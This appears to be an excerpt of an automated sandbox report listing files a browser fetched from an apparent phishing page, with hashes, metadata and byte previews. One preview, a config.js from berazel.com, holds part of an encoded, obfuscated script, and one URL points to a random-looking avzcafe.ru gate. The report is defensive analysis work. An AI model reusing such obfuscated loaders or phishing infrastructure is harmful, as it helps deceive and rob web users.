                                                                                                                          Preview:wOF2......;........d..;..........................d..z..J.`..L.Z..<.....\..`..^...x.6.$..6. ..|. ..8..z%......Q.{..q...FF.kd .8.(..d..).!C...Y.JA...r. ..GH8F......nW...".2&....2<..+C...p...b..SC.......J......z.-..Q..#6&1zUe../\...l.....<.....9s...E~.]B-..B.wY..o......Q..*A.F..1j.......-.`P% .. ,..@1.0..~.....WWW.d.u<c{..^.R.+..w....&.........A......+C....(.N.....0.~..0.J.;.Nu..7....]..m.H.....[h.GL3....?)....c.H...2.3.}y........SXI|..iVN'%E.D.W....r..<`....i....6;E$.....U.$j.@...._.......R2....WS...k.vz.R.'a9!^..*.N....h.._.....c.%."..S.2.16B...o.2}.pmU[.|.LI....2.....OWQLO1-....s..8.(...".|6...6R.. ..M-.zO.}w)..v..mXxX...c..3*#.+.v....F`.Z;.zQ.......r,....Yo.....g.h....+.....O.3Y..)Y.8.!....elX......._.3.}k~u.{ C..H.z..FP........@...d..)T.R...L.H.J.j.@..............$...E......y...3.b...I.h u.+%.HA.\..9..8..X.!....gx...].:..V..C...._..X..!....6..)...GM:E.....O.Z.*}k.;.T.k..D.k.O..D5.r..."......?..T.Q.A...CF...3g.5.Dn<.QPy..G..1.9..Q..0..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (5275), with CRLF line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5459
                                                                                                                          Entropy (8bit):5.932879143714405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:+kZOiYi+WDau8V6vxRgfqirQ5cjZW6KvY71k74k+1ZR4WJIhylnaalUDTQ9I1xEv:+cii+Wmu8V6vgfqirUuxKw71kRYZCWJh
                                                                                                                          MD5:A637AAF3FF21943CBA8915B5BEE39045
                                                                                                                          SHA1:999A2D2600EAE23F26BB9DA770F721E6640E4D53
                                                                                                                          SHA-256:D64624B393274B5DD43E0F00042715B36ED3B114098DDDACD71A40B9828FC12C
                                                                                                                          SHA-512:A528245DD9F2250E58F3ABC724B6408CA8CAB3A4E5153194364FD72D4FF7C356F89CDE0728299FEE824CE2FBC28CB84DB783B43AE2C4DBEEC740E75425E47DD8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://berazel.com/wellness/south/config.js
                                                                                                                          Preview:var encodedScript = "cS0/WAIjGiVeGlNwPUF4WnlrPFcTdxYnUVsWFCMoNx48L2oLQXBUcToSWnBmPyoDeTBAFkF3U2oQRBsiZi41GzAnD1gCOBcvVBJHcDEiNh42PGRaDjQSPlldFH4uKisSdzg/VBIjASNeVVJhb3BSWnlrahZBPhVqGFcXMS8nHRQ6JC5TBX5TMToSWnBma3haeS4nVwg7Ny9TXR41ImtlWjg/JVRJMh4rWV4/PiUkPB89YnE8QXdTahASB1pma3haJGspVxU0G2oYV1NwPUF4WnlrahYCOB05X14ffiM5KhUrY21wAD4fL1QSDj9mLz0ZNi8vFgQ6EiNcCF18Zi5xQVNrahZBKnlqEDhacGZrd1V5DjJCEzYQPhBWFT0nIjZaMC1qRg4kACNSXh9aZmt4Wi8qOBYFOB4rWVxabWZsf0FTa2oWQT4VahhXFzEvJxwfOiQuUwV3VWwQVxcxLyccHzokLlMFeRokVFcCHyBjfzp+YmoIQXpCYxBJcHBma3haeS8lWwA+HWoNEh89JyI0PjwoJVIEM105QF4TJG5sGF1wEHtrWl1TahASB1pma1JaeWtqGU53JjlVEjk8IyoqGDA/aloOMBxqWVRaNCkmORM3ayNFQTYFK1leGzIqLlJaeWtqQAAlUyZfVRUDNCh4R3kvJVsAPh1qDxJYODI/KAljZGVaDjAcZFNeHzE0KTEOdyglW051U2EQVhU9JyI2WmNrbRFaXVNqOhJacGY9OQh5JitfDxQcJERTEz4jOXhHeS8lVRQ6FiREHB01Mg40HzQuJEIjLjouGBUXMS8lGxU3PytfDzIBbRkJcHBma3gXOCIkdQ45BytZXB8iaDgsAzUuZFIIJAMmUUtabWZsPhY8M20Na3dTahBfGzkoCDcULSojWAQlXTlESxY1aC00HyEPI0QENAcjX1xabWZsOxU1PidYRmx5ahASWj0nIjY5NiU+Vwg5FjgeQQ4pKi5
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1080, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):20353
                                                                                                                          Entropy (8bit):6.370391808181913
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:JdVkb4M0L9cTSlH2BRcHStFMqdJBC5Tnn0YUM7:6bEtfoDY5Tck
                                                                                                                          MD5:AF05F4963AAABC6880D51E16BE1DA571
                                                                                                                          SHA1:96F3322258A2B18AF3CF1B6C0CD07A8C5D9D5904
                                                                                                                          SHA-256:2B7538E3F280FBEA2E137FE23A9B5001460B95EFFBA9591AED0F73E9BD04D828
                                                                                                                          SHA-512:FE9FE6D96DEF3420115DCBF044942A25D29A73C04A234A32B1C33F4C97FB87C078A0E7A68A5C15AFD5F745B79A11B520E0388540049D0B0A882ABC2CF553B088
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://pbs.twimg.com/media/GY70XKXXEAA_bbZ?format=jpg&name=large
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................8...."...........................................................................B..B.%.Q..............@...*....@@.....(........`."...........*........R....J ........*......P....*........@........@)......... ..............,. .......... ...............*".PT.....E..T@P.........T................A.....,RP...........................P....(..`.*......@...........................(...........`.@.....@.....&.. (.B..(... (.....!@..............B...D...(J..................b..........@.............@,.(.....R....M@ ...........*.....J.......@............R......@.....,.X*...*....).......... ................. ....`....X(.............A`....,U........... ..... ......PT........X....`X......D............P@.......@.........D.....(...........,....*(.......*.............@..........,....*.....,..... .(.,........X.B.*P..........(....................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):7726
                                                                                                                          Entropy (8bit):7.949882373759263
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:yZPer6Bhe6O91pJ3s8qD0wngAuCUeUKzvn:yhe2her9RTqmheUK7
                                                                                                                          MD5:879705AC5AEED73C7C02FD3F89C84802
                                                                                                                          SHA1:84D178B5781F2EE3B3340C9B5A1E11BA27237DBC
                                                                                                                          SHA-256:8B81B87931012908D4924C0870B1DC8D540AF73C475D6192F745107BB4A4F07C
                                                                                                                          SHA-512:4C1914B1B9E428BB112CF2BE021E5A913FBAA70808E7D33E77BF56208FF24CD3426FEF8E736A56177BC5B4321A0D584E96C0B5B5F0149CCC75D2364B140F8C33
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://logo.clearbit.com/housingcenter.com
                                                                                                                          Preview:.PNG........IHDR.............L\......IDATx..}..\Wu.Y.}....Z..l.Y..|..a..@.L..6aX....q.d...v..;....!.2$.l.;...!l..-.m..[.%.%uU.w.9g.{.V.F.v...:......W..s.Y.s.33.QZ............TWG../}..=.d.%...Y...F..8...R.i/..d....!1..@@..-.....>p........TL.G.....>..i/......v=8.h...Wv.z.{/............Z.{\O.e.H>.lP!0.42..]......."m..7...!...[.....u".....L........7......?..*(;.k.f...5.V.^_:h.. "...!.f&2.. ...E../]...Rw6..&....q...?...@..Q.....29...D..}.....~V.K...D..m.#'.g.;...,9.....n}.>u>....#_.tq .......L...N...Z...,.v7..Z.rD...O...w.?.c..t..2.....B..*.h..'!..nr(f.f..,.......g...E.....E._.Z.+.A.k....1...w..J.C....Q00M.T...%R.%...Dq....G...v^....b.Z.*".n..Nb... ..h.."-.ZGt.......<...+..O.....?.....zh..u..]/4M. .l'.OZ......... z_....|..4...86....y..GW.;^..}..*......?..T....$......XWy.XO...7.!.....e...d9.......>8J.e.)G..n.......@.).e5....W;.f....i..u.z..i. S..d..kD.C].3..y.j.p......@V......%.....0#"...$1Z.q..`..%.j..D......&.....`.^..q..}..*.t...M5.P..7...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (618)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):559916
                                                                                                                          Entropy (8bit):5.709368907255143
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:j425DozjliD3fdArAw6OGT6HA9K1NQeWWX8nKAK+KZ8Wlm0vrqsy8t9758ud7R5:LD+jliD3FAcDYjL7Mn1KDZdIyOo17R5
                                                                                                                          MD5:94A89B84A37295C0E5B4940372E4881D
                                                                                                                          SHA1:C8F139EAFDF40B65B7B5FBBBA851C8049B66E1A5
                                                                                                                          SHA-256:4FF2DC0918273AD6922591D0D21A5FB0B1FEC77FBFCF844BAE9F783977550D09
                                                                                                                          SHA-512:12B3B825BA3D86B2D9FE9E62CB1B6ED4EFCC3A785D10A02342629F0194C5E4A4F25754A2D97C050C96D7CFF8CD25A6DEF3E3A35EB5C11197B9F05B35D544CA43
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/.var X=function(){return[function(Y,h,K,I,P,O,E,H,m,M,p,L,v){if((Y&78)==((Y+2^17)<(v=["offsetHeight","prototype","apply"],Y)&&(Y-6|8)>=Y&&(L=R[45](1,h.id,h.name)),Y))for(m=[12,"fontSize",2],M=x[47](13,m[1],K),p=(E=M.match(KY))&&E[0]||h,M&&"px"==p?H=parseInt(M,10):(O=v7("SPAN",{style:"visibility:hidden;position:absolute;line-height:0;padding:0;margin:0;border:0;height:1em;"}),K.appendChild(O),M=O[v[0]],t[23](16,O),H=M),B[38](72,K,m[1],H+"px"),P=R[4](59,K).height;H>m[0]&&!(I<=0&&P<=m[2]*H)&&!(P<=I);)H-=.m[2],B[38](72,K,m[1],H+"px"),P=R[4](59,K).height;if((Y<<2&11)<8&&(Y^25)>=27)if(K.length<=h)L=String.fromCharCode[v[
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (47691)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):47692
                                                                                                                          Entropy (8bit):5.4016459163756165
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                          MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                          SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                          SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                          SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):665
                                                                                                                          Entropy (8bit):7.42832670119013
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUelyuRs56fyKgIEInu5VLJBZInmJhd/3VqQXD8GBm1:belFRs56fuIEIu5VNBZInMTICfBO
                                                                                                                          MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                                                                                          SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                                                                                          SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                                                                                          SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/info_2x.png
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (618)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):559916
                                                                                                                          Entropy (8bit):5.709368907255143
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:j425DozjliD3fdArAw6OGT6HA9K1NQeWWX8nKAK+KZ8Wlm0vrqsy8t9758ud7R5:LD+jliD3FAcDYjL7Mn1KDZdIyOo17R5
                                                                                                                          MD5:94A89B84A37295C0E5B4940372E4881D
                                                                                                                          SHA1:C8F139EAFDF40B65B7B5FBBBA851C8049B66E1A5
                                                                                                                          SHA-256:4FF2DC0918273AD6922591D0D21A5FB0B1FEC77FBFCF844BAE9F783977550D09
                                                                                                                          SHA-512:12B3B825BA3D86B2D9FE9E62CB1B6ED4EFCC3A785D10A02342629F0194C5E4A4F25754A2D97C050C96D7CFF8CD25A6DEF3E3A35EB5C11197B9F05B35D544CA43
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__en.js
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/.var X=function(){return[function(Y,h,K,I,P,O,E,H,m,M,p,L,v){if((Y&78)==((Y+2^17)<(v=["offsetHeight","prototype","apply"],Y)&&(Y-6|8)>=Y&&(L=R[45](1,h.id,h.name)),Y))for(m=[12,"fontSize",2],M=x[47](13,m[1],K),p=(E=M.match(KY))&&E[0]||h,M&&"px"==p?H=parseInt(M,10):(O=v7("SPAN",{style:"visibility:hidden;position:absolute;line-height:0;padding:0;margin:0;border:0;height:1em;"}),K.appendChild(O),M=O[v[0]],t[23](16,O),H=M),B[38](72,K,m[1],H+"px"),P=R[4](59,K).height;H>m[0]&&!(I<=0&&P<=m[2]*H)&&!(P<=I);)H-=.m[2],B[38](72,K,m[1],H+"px"),P=R[4](59,K).height;if((Y<<2&11)<8&&(Y^25)>=27)if(K.length<=h)L=String.fromCharCode[v[
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):15552
                                                                                                                          Entropy (8bit):7.983966851275127
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                          MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                          SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                          SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                          SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                          Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (18288)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):18908
                                                                                                                          Entropy (8bit):5.6255223057698815
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:dVtfxzksuna6B3+9A/CY3DCcdye4PCwEnaeXsLRKyuHX/5:VKRai5HPIeaeX1yM
                                                                                                                          MD5:0240AA22895CF57CB91160E784542720
                                                                                                                          SHA1:F50652CCC59E7556511178A2A6BF92407D2E0955
                                                                                                                          SHA-256:5DEEC06E184F7D97048A4A0D9A182105700484EBAC0C804A58A4BFAE84B843B1
                                                                                                                          SHA-512:C4CADEB4398EB472EEF4989627E74C8CC9A80A1045F2C01E3DCFA63D20B52901223F90AB0A0F6F13833F627A0A5C4BBDDEB86CA9F4A2972654F881B2DF4B1879
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var U=function(p){return p},G=function(p,b){if(!(p=(b=null,B).trustedTypes,p)||!p.createPolicy)return b;try{b=p.createPolicy("bg",{createHTML:U,createScript:U,createScriptURL:U})}catch(e){B.console&&B.console.error(e.message)}return b},B=this||self;(0,eval)(function(p,b){return(b=G())&&p.eval(b.createScript("1"))===1?function(e){return b.createScript(e)}:function(e){return""+e}}(B)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var H=function(p,b){for(b=[];p--;)b.push(Math.random()*255|0);return b},C=function(p,b){b.J.splice(0,0,p)},e_=function(p,b,U,B,Y){function r(){}return B=(p=$q(p,function(v){r&&(b&&bb(b),Y=v,r(),r=void 0)},(Y=void 0,!!b)),p)[1],U=p[0],{invoke:function(v,W,E,e){function G(){Y(function(X){bb(function(){v(X)})},E)}if(!W)return W=U(E),v&&v(W),W;Y?G():(e=r,r=function(){bb((e(),G))})
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru/450651641146885713188409uEDZBXeukDSKEJVJYYHNXWLRZMBRXSICETHCSJUGTTQLXNSIAORTBKCRSEOOR
                                                                                                                          Preview:1
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5981
                                                                                                                          Entropy (8bit):7.903706051026774
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yE1fyBHhgyZNETB/ghFtbsC3HWrcdF2dJVOl2ubHynpaIsInbPUB5tqmsCCG7+FB:yMfiHhgyHEN/g13XWYDaOlhL6patFsCW
                                                                                                                          MD5:2B311A6368033E026AE0488594D60E9F
                                                                                                                          SHA1:FB6ED53361536ACEF9D2FBEC169F537C2E0BEAA5
                                                                                                                          SHA-256:5E36904AF8B2A26DD0214D45D02528BADD9F0D51EF71145465EC33E9D8055057
                                                                                                                          SHA-512:BAC087DC7E87FE2D6FFD24CAF24A03F9170EACEB591FC988A7D4016AE60C8CC09C8488609FA5C3C86F3418CF7A80A114ADC12CC919C94B716C405C5916CAA14E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA4zoaFDNqO6EzovS0z4d28jooK4dChq1FVzINjqws77O5XliAiRm6JwAXJIelvyPaGA7eyHEScZ9B-2Dt4fZCirlp1hgSqfhqjExzgZHyhA1pkWUqTxGRIt7UmGqcBJiJ7SX6HXfXTtlRXPSEBLBuGHTqFUCB0V5kKhRcw4srZx1LAMU3_TJaeV0lty1k1XFUaro2-L&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=cbb98b901b4c82b5
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....H%....6....^.^=...........r.......-..8....]E(....p.x.u9.q.5..U.G.a...6:.^F.F.$u.:W"..ZV....s....O......$s.N$.bO2...en...A..j4....wv.tQ.%.r......~C.<......|.*U..v...c.<.<..8..s......K<c`"9.).0.^...t..........|..8.+.o.....e.Fq..K.Oy<..Y...S.....<...94.y.....is...V|ch. .L.z....).D.$.`.c.G..c....`.d.w..!`..-..@.d/O.3s.#.={..t..f.&\..........S....-..}...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5981
                                                                                                                          Entropy (8bit):7.903706051026774
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yE1fyBHhgyZNETB/ghFtbsC3HWrcdF2dJVOl2ubHynpaIsInbPUB5tqmsCCG7+FB:yMfiHhgyHEN/g13XWYDaOlhL6patFsCW
                                                                                                                          MD5:2B311A6368033E026AE0488594D60E9F
                                                                                                                          SHA1:FB6ED53361536ACEF9D2FBEC169F537C2E0BEAA5
                                                                                                                          SHA-256:5E36904AF8B2A26DD0214D45D02528BADD9F0D51EF71145465EC33E9D8055057
                                                                                                                          SHA-512:BAC087DC7E87FE2D6FFD24CAF24A03F9170EACEB591FC988A7D4016AE60C8CC09C8488609FA5C3C86F3418CF7A80A114ADC12CC919C94B716C405C5916CAA14E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....H%....6....^.^=...........r.......-..8....]E(....p.x.u9.q.5..U.G.a...6:.^F.F.$u.:W"..ZV....s....O......$s.N$.bO2...en...A..j4....wv.tQ.%.r......~C.<......|.*U..v...c.<.<..8..s......K<c`"9.).0.^...t..........|..8.+.o.....e.Fq..K.Oy<..Y...S.....<...94.y.....is...V|ch. .L.z....).D.$.`.c.G..c....`.d.w..!`..-..@.d/O.3s.#.={..t..f.&\..........S....-..}...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):600
                                                                                                                          Entropy (8bit):7.391634169810707
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUT9vceKKNtY3kM8O+mucROzZbJOAjPBE2Iq8AnxT9:bTdcVIM8tfHzzjy2IdKT9
                                                                                                                          MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                                                                                          SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                                                                                          SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                                                                                          SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5696
                                                                                                                          Entropy (8bit):7.89883477567703
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yEXbxlcbU3m4xp2/2TcKepHGjcKCihfcgeWvpvs2CXJHBn/AqgYkW1vSVe7ZN:ymVl53my2ok0c5+fcjWrwHNoqhvS2ZN
                                                                                                                          MD5:F4B351982B480F53DF105E2DF09C070B
                                                                                                                          SHA1:04FF83E548C0DD44D099F3F687AB8DC06E8B95FC
                                                                                                                          SHA-256:6D2BB998F220E3CFD3DCA23531DCCB8E2444AC6576E792C4D729F532BF733FD9
                                                                                                                          SHA-512:20C49A45E12C1B1DF350DA254E0D697F03AD57630A4FAF5285760B844723131E157B8D1C5FFA3772F2CA6686822A82E8AFCD2CCA68EF28FE60CDA77E59CE1879
